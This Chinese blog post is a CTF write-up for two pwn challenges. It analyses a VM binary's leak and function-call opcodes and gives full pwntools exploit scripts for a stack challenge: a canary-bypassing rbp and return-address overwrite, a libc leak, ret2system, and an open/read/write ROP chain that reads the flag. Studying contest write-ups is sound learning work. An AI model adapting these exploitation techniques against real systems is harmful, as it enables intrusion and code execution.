2025网古杯pwn 部分wp

最新推荐文章于 2025-12-01 19:52:20 发布
原创 最新推荐文章于 2025-12-01 19:52:20 发布 · 366 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全 #ctf

只做了两道pwn

PWN1

一道简单的VM题,
简单分析一下漏洞点和程序:

unsigned __int64 __fastcall sub_4012A0(__int64 a1, __int64 buf, unsigned __int64 size)
{
  unsigned __int64 v3; // rax
  unsigned __int64 result; // rax
  __int64 *v6; // [rsp+28h] [rbp-58h]
  __int64 v7; // [rsp+38h] [rbp-48h]
  __int64 v8; // [rsp+40h] [rbp-40h]
  __int64 v9; // [rsp+48h] [rbp-38h]
  __int64 v10; // [rsp+50h] [rbp-30h]
  __int64 v11; // [rsp+58h] [rbp-28h]
  unsigned __int64 v12; // [rsp+68h] [rbp-18h]

  v12 = 0LL;
  while ( 1 )
  {
    result = v12;
    if ( v12 >= size )
      return result;
    v3 = v12++;
    switch ( *(_BYTE *)(buf + v3) )
    {
      case 1:
        result = v12 + 8;
        if ( size < v12 + 8 )
          return result;
        sub_4011D6(a1, *(_QWORD *)(buf + v12));
        v12 += 8LL;
        break;
      case 2:
        sub_40122D(a1);
        continue;
      case 3:
        v8 = sub_40122D(a1);
        v7 = sub_40122D(a1);
        sub_4011D6(a1, v7 + v8);
        continue;
      case 4:
        v10 = sub_40122D(a1);
        v9 = sub_40122D(a1);
        sub_4011D6(a1, v9 ^ v10);
        continue;
      case 5:
        if ( *(int *)(a1 + 8) > 0 )
          printf("PRINT: %ld\n", *(_QWORD *)(a1 + 8 * (*(_DWORD *)(a1 + 8) - 1 + 2LL)));
        continue;
      case 6:
        if ( *(_QWORD *)(a1 + 144) )
          (*(void (**)(void))(a1 + 144))();
        continue;
      case 7:
        result = v12 + 8;
        if ( size < v12 + 8 )
          return result;
        v6 = *(__int64 **)(buf + v12);
        v12 += 8LL;
        signal(11, handler);
        v11 = *v6;
        signal(11, 0LL);
        printf("LEAK: [0x%lx] = 0x%lx (%lu)\n", v6, v11, v11);
        break;
      default:
        continue;
    }
  }
}

  • 操作码1: 压入8字节值到栈

  • 操作码2: 弹出栈顶值

  • 操作码3: 加法运算

  • 操作码4: 异或运算

  • 操作码5: 打印栈顶值

关键漏洞 - 任意代码执行 (Critical Vulnerability)

  • 操作码6: 允许执行任意函数调用 机制: 检查a1+144位置的值,如果不为0,则将其作为函数指针调用 利用:
    通过操作码1可以向a1+144位置写入任意地址,实现任意代码执行

内存泄露功能 (Memory Leak)

  • 操作码7: 提供内存读取功能
  • 功能: 可以读取任意地址的内存内容

EXP我打完比赛就连文件一起删了,没有附件也实在给不了了。
总体来说不难,就先利用 操作码7泄露libc,然后计算出one_gadget的地址,
然后用操作码一多push 几次 one_gadget最后调用操作码6就能拿到shell了,很简单

PWN2

开启了canary保护没开pie
main函数:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  int v5; // [rsp+Ch] [rbp-54h] BYREF
  char s[16]; // [rsp+10h] [rbp-50h] BYREF
  __int64 v7; // [rsp+20h] [rbp-40h]
  __int64 v8; // [rsp+28h] [rbp-38h]
  unsigned __int64 v9; // [rsp+58h] [rbp-8h]
  __int64 savedregs; // [rsp+60h] [rbp+0h] BYREF

  v9 = __readfsqword(0x28u);
  init(argc, argv, envp);
  strcpy(s, "This is canary!");
  v7 = 0LL;
  v8 = 0LL;
  v3 = strlen(s);
  write(1, s, v3);
  puts("Do you want to enter other functions?");
  v5 = 0;
  __isoc99_scanf("%d", &v5);
  if ( v5 == 1 )
    gift();
  else
    read(0, &savedregs, 0x10uLL);
  return 0;
}

这里可以直接改Rbp和返回地址,利用先把rbp改成__stack_chk_fail的地址,然后返回地址改成read(0, &savedregs, 0x10uLL);的地址,就可以实现任意写,把__stack_chk_fail写成gift的地址就能利用gift函数实现栈溢出了。

EXP:

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
elf = ELF(pwnfile)
libc = ELF("./libc_2.31.so")


s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} ==========================>>> {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


leave_ret = 0x0000000000401288
continue_addr = 0x401110
pop_rdi = 0x00000000004013e3
gift_addr = 0x40123D
ret = 0x000000000040101a
gadget = [0xe6aee,0xe6af1,0xe6af4]

def pwn():
	ru(b"Do you want to enter other functions?")
	s(b'0\x00')

	s(p64(0x404030)+p64(0x40133F))

	s(p64(gift_addr))

	sleep(1)
	sl(b"a"*0x48+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(continue_addr))
	
	s(b"\x00")
	puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
	libc_base = puts_addr-libc.sym['puts']
	system = libc_base+libc.sym['system']
	binsh = libc_base+next(libc.search(b"/bin/sh\x00"))
	leak("libc_base",libc_base)

	sleep(1)
	ru(b"This is canary!Do you want to enter other functions?")
	s(b'1\x00')
	sl(b"a"*0x48+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system))
	sl(b"aaaa")

	itr()

if __name__ == "__main__":
	# while True:
		# io = remote("119.36.240.225",40340)
		io = process(pwnfile)
		try:
			pwn()
		except:
			io.close()

在这里插入图片描述

然后我还有个骚方法就是如下:(只利用read(0, &savedregs, 0x10uLL读取文件或者getshell)😉

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
elf = ELF(pwnfile)
libc = ELF("./libc_2.31.so")


s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} ==========================>>> {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


leave_ret = 0x0000000000401288
continue_addr = 0x401110
pop_rdi = 0x00000000004013e3
pop_rsi_r15 = 0x00000000004013e1
ret = 0x000000000040101a

def pwn():
	ru(b"Do you want to enter other functions?")
	s(b'0\x00')
	s(p64(0x404030)+p64(0x40133F))
	s(p64(continue_addr))


	ru(b"Do you want to enter other functions?")
	s(b"0\x00")
	s(p64(0x404200)+p64(0x40133F))
	s(p64(pop_rdi)+p64(elf.got["puts"]))


	ru(b"Do you want to enter other functions?")
	s(b"0\x00")
	s(p64(0x404210)+p64(0x40133F))
	s(p64(elf.plt['puts'])+p64(pop_rsi_r15))

	ru(b"Do you want to enter other functions?")
	s(b"0\x00")
	s(p64(0x404220)+p64(0x40133F))
	s(p64(elf.got["write"])+p64(0))

	ru(b"Do you want to enter other functions?")
	s(b"0\x00")
	s(p64(0x404230)+p64(0x40133F))
	s(p64(ret)+p64(0x40123D))

	#################################

	ru(b"Do you want to enter other functions?")
	s(b"0\x00")
	s(p64(0x404240)+p64(0x40133F))
	s(p64(pop_rdi)+p64(0))

	ru(b"Do you want to enter other functions?")
	s(b"0\x00")
	s(p64(0x404250)+p64(0x40133F))
	s(p64(pop_rsi_r15)+p64(0x4042a0))

	ru(b"Do you want to enter other functions?")
	s(b"0\x00")
	s(p64(0x404260)+p64(0x40133F))
	s(p64(0)+p64(elf.plt['read']))

	ru(b"Do you want to enter other functions?")
	s(b"0\x00")
	s(p64(0x404270)+p64(0x40133F))
	s(p64(0x00000000004013dd)+p64(0x4042a0))  #pop rsp

	#########################

	ru(b"Do you want to enter other functions?")

	s(b"0\x00")
	s(p64(0x404200-8)+p64(leave_ret))

	puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
	libc_base = puts_addr-libc.sym['puts']
	leak("libc_base",libc_base)

	sl(p64(0))
	sleep(1)

	pop_rdx_r12 = libc_base +0x000000000011c1e1
	pop_rax = libc_base+0x000000000004a550
	syscall_ret = 0x13d4ab+libc_base
	flag = 0x4042a8

	payload = p64(pop_rdi)+p64(flag)+p64(pop_rsi_r15)+p64(0)*2+p64(pop_rdx_r12)+p64(0)*2+p64(pop_rax)+p64(2)+p64(syscall_ret)#open
	payload += p64(pop_rdi)+p64(3)+p64(pop_rsi_r15)+p64(0x404300)*2+p64(pop_rdx_r12)+p64(0x60)*2+p64(pop_rax)+p64(0)+p64(syscall_ret)#read
	payload += p64(pop_rdi)+p64(1)+p64(pop_rax)+p64(1)+p64(syscall_ret)#write

	sl((b"flag\x00\x00\x00\x00")*3+payload)


	itr()


if __name__ == "__main__":
	# while True:
		# io = remote("119.36.240.225",40340)
		io = process(pwnfile)
		try:
			pwn()
		except:
			io.close()

在这里插入图片描述
本地也是能打通,远程不清楚。

2024第二届剑山网络安全大赛WP by B4stiC1ub(部分题目)
HY_Czy的博客
12-04 1348
第二届剑山线上初赛wp
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6304
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
2025剑山”第三届全国大学生络攻防大赛初赛部分wp
2301_80545762的博客
12-01 1264
2025剑山”第三届全国大学生络攻防大赛初赛部分wp
ciscn & 长城 2025半决赛 pwn typo
little_hamst3r的博客
03-17 1730
ciscn & 长城 2025半决赛 pwn typo 题解,可惜是赛后出的,我还是写的太慢了(比赛期间就 fix 了一下),由于进行了一定的爆破,本脚本的成功率大概 1/16。
#2019江苏领航部分wp
qq_39683062的博客
11-25 2912
关于2019领航部分wp 两天前参加了领航,奋斗了24小时,做出了十几题。 第一题签到题 base64解码 第三题steganoI 一个简单的隐写,可以用strings查看他的信息 第四题stegano 使用binwalk产看其中隐藏一个zip,解压出得到flag 第五题Lsb 使用stegano图片三色素,查看红色三号通道查看到一段英文,即为flag 第七题文件恢复 解压完之后把flag...
ISCC 2024 部分wp
热门推荐
焦虑的焦虑
05-25 1万+
ISCC 2024 部分wp
[2022红明]web题目复现
cosmoslin的博客
04-02 1424
Fan website 存在源码泄露,www.zip 审计代码,发现一个album路由,且有一个控制器module/Album/src/Controller/AlbumController.php,控制器能实现上传,删除等操作。 在上传部分可以看到过滤了 preg_match("/<\?|php|HALT\_COMPILER/i", $cont ) 从这里猜测应该是phar反序列化,那么我们还需要一个触发点,在文件删除操作调用了unlink函数 接下来就是找链子,由于提示了laminas组件,
[剑山2023] pwn
weixin_52640415的博客
12-11 381
unsort attack IO_file
2025年全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了!
白帽黑客八哥的博客
02-11 1021
参与当下举行的ctf赛事是最好的学习方法之一,即使是初学者也能够找到一些适合自己能力的赛事,比如极客大挑战、UNCTF、各个大学的新生赛等等都是不错的选择,在比赛中去发现自己知识的不足,然后去针对的补充这部分知识,是很好的学习循环,无需迷茫的去到处获取知识,而是在需要时去学习。后续的学习方法或许该由你自己决定,我在此只给一些建议。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了!
2402_84205067的博客
01-18 721
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联化提供安全保障。
新手CTF实践
qq_48732306的博客
12-13 807
实验四 CTF实践 红色部分无需打印,套用实验报告模板 实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验原理: 1、什么是CTF CTF(Cap
CTF实践
suzyrose
12-16 431
实验四 CTF实践 红色部分无需打印,套用实验报告模板 实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验原理: 1、什么是CTF CTF(Cap
实验四 CTF实践
qq_52130446的博客
12-21 375
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验原理: 1、什么是CTF CTF(Capture The Flag)中文一般译作夺旗赛,在络安
渗透小白4:CTF实践
qq_50912184的博客
12-22 905
什么是CTF CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界”。 CTF竞赛模式 (1
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8834
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 络时代生活越来越离不开络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
jmeter DSL 2.0支持压力测试和接口测试
12-04
jmeter DSL 2.0支持压力测试和接口测试
【Egg.js 管理系统】后台全功能 + MySQL 适配 + 直接部署 + 高下载!亲测可用!.zip
12-04
【Egg.js 管理系统】后台全功能 + MySQL 适配 + 直接部署 + 高下载!亲测可用!.zip
【轴承故障诊断】基于融合鱼鹰和柯西变异的麻雀优化算法OCSSA-VMD-CNN-BILSTM轴承诊断研究【西储大学数据】(Matlab代码实现)
最新发布
12-04
内容概要:本文提出了一种基于融合鱼鹰算法和柯西变异的改进麻雀优化算法(OCSSA),用于优化变分模态分解(VMD)的参数,进而结合卷积神经络(CNN)与双向长短期记忆络(BiLSTM)构建OCSSA-VMD-CNN-BILSTM模型,实现对轴承故障的高【轴承故障诊断】基于融合鱼鹰和柯西变异的麻雀优化算法OCSSA-VMD-CNN-BILSTM轴承诊断研究【西储大学数据】(Matlab代码实现)精度诊断。研究采用西储大学公开的轴承故障数据集进行实验验证,通过优化VMD的模态数和惩罚因子,有效提升了信号分解的准确性与稳定性,随后利用CNN提取故障特征,BiLSTM捕捉时间序列的深层依赖关系,最终实现故障类型的智能识别。该方法在提升故障诊断精度与鲁棒性方面表现出优越性能。; 适合人群:具备一定信号处理、机器学习基础,从事机械故障诊断、智能运维、工业大数据分析等相关领域的研究生、科研人员及工程技术人员。; 使用场景及目标:①解决传统VMD参数依赖人工经验选取的问题,实现参数自适应优化;②提升复杂工况下滚动轴承早期故障的识别准确率;③为智能制造与预测性维护提供可靠的技术支持。; 阅读建议:建议读者结合Matlab代码实现过程,深入理解OCSSA优化机制、VMD信号分解流程以及CNN-BiLSTM络架构的设计逻辑,重点关注参数优化与故障分类的联动关系,并可通过更换数据集进一步验证模型泛化能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值